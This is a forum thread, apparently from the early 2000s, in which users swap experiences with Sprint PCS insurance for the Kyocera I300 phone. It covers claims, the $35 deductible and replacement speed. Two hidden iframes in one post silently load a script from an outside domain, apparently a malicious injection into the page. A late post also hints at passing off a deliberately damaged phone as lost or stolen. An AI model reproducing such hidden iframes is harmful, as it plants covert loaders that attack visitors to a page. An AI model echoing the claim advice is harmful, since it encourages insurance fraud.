+ Reply to Thread

Anyone used the insurance yet?

I signed up for the insurance and am wondering how smoothly it works, if it is ever necessary. Does the insurance cover damage (dropping the unit) as well as loss or theft? Hopefully, I won't need this for a while but was just wondering.

Peter<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Peter

Good thinking, friend. Shame on one
    who doesn't see the benefit in 4 dollar
    a month coverage on a $500 device.

It actually works quite simply. Call in
    with your problem and one is shipped
    "immediately" with a return packet for
    the broken phone. That is, of course,
    if the phone is damaged. If lost or
    stolen, a police report is necessary. As
    long as obvious abuse is not apparent,
    the process should be hassle free.

The policy states that refurished phones
    are given, yet I doubt this applies to the
    I300 in that it is new.

Administrator

Arrow

works like a charm....

years ago in the B.PDA era (Before Personal Digital Assistants),

i dropped my startac many a time and this one time when it dropped it severed in two...

so i made the claim and in 4 days i had a brand new startac sent in the mail... i put my old one back in the box (they provide postage already) and sent it on its way... very smooth!

worth every penny!

Insurance

I started having trouble with my I-300 last week -- the digitizer kept screwing up, and I could not select anything in the right quarter of the screen. I called the insurance company and the VERY NEXT DAY my brand new I300 arrived. It was even a slightly more recent model (on the back in said ver. 01.10 where the old one said 01.09. The software for the the phone and palm also had higher numbers than the old one (the only differences I have noticed, though, is that the reset button now has the word "reset", the silkscreen button for selecting the keyboard -- the small "a" -- works properly without me having to press all the way to the edge of the screen, and the screen is much better looking without having to push the contrast bar all the way to the right). Otherwise, it is the same. To top it off, though, I forgot to include the old sync cradle and second battery when sending back the malfunctioning phone, and I have heard no complaints yet. All in all, I am VERY pleased with the insurance.

Not such good luck...

My wife's Timeport just broke, and the Sprint PCS insurance said they didn't have any in stock to send us. They had no idea when they would even have any, so they wanted to send another phone sanyo something or other. Problem is, then I have to go buy all new freaking accesories... car charger, batteries, etc. WTF? They told me it says someting about an equal type phone in the contract. Whatever, I don't even remember seeing a contract. This sucks! Wifes phone is BROKE and they won't even send us a replacement.

Now this has me thinking. Is the insurance on the I300 worth a damn? Are they going to want to give me a Kyocre <sp> PDA/phone instead? I assumed the insurance was to replace the exact same phone. They are still making the Timeport/Startacs?

Administrator

Arrow

not sure it they are stillmaking the timports.. but the i300 is a 500 dollar phone... they WILL have soe in stock for sometime to come.. also the 6035's will be instock...

yep there is a clause that says you will get a phone of "equal" value...

the timeport must be an old phone for them not to send you another one out...

perhaps its time to get a new phone... they dont last long ya know....

i know the equipment insuyrance works wonders.. i used it once and got a brand new startac in 4 days....

How do I get the insurance. My husband ordered the phone online, and I did not get any info about warranties (extended or otherwise.

Call *2 from your I300 and just ask for it. An automated service rep named Claire should attempt to assist you initially. We've found that saying "customer service" followed by "customer service" again should patch you through rather quickly to a live rep. You'll be billed the $4/month and the coverage should begin immediately.

Cost of Insurance

Correct me if I"m wrong, but there's a $35 replacement fee as well as the $4 per month, right?

Correct. There is a $35 deductible. Please don't do the math and attempt to rationalize not getting the service. Provided you lose two phones within twelve months, the most you'd pay, inclusive of all fees, is $118 for the years coverage and the two new phones. Its worth it.

What exactly does the insurance cover?

When I called *2 from my phone, the rep I spoke to did not seem to know much. She said the insurance covered loss, theft and manufacturer's defect. She said it did not cover damage such as if I cracked the screen. She basically said that the only difference between the warranty and the insurance is that the insurance covers loss and theft.

This did not make sense to me.

She gave me an 800 number to order the insurance. I have since lost the number. Does anyone have it?

I don't have the number. Get the number though. I can't stress that enough. Ask Marc about how he beat up one of his phones and had it switched no questions. And to be completely honest, or perhaps completely dishonest:p, who cares what happens to your phone. Even if your dog mangles it, or you go swimming with it, or even use it as a ball while playing soccer, the plan covers loss and theft. Not like the plans at electronics stores where normal wear and tear is covered and if you had it stolen you're out of luck. Regardless of what happened to your phone, a new one will be shipped with materials to return the defective phone. In the event it is lost or stolen, a police report number is required.

Its no biggie. Think of how many mobile phones are left in cabs every hour. Its there for you Please use it.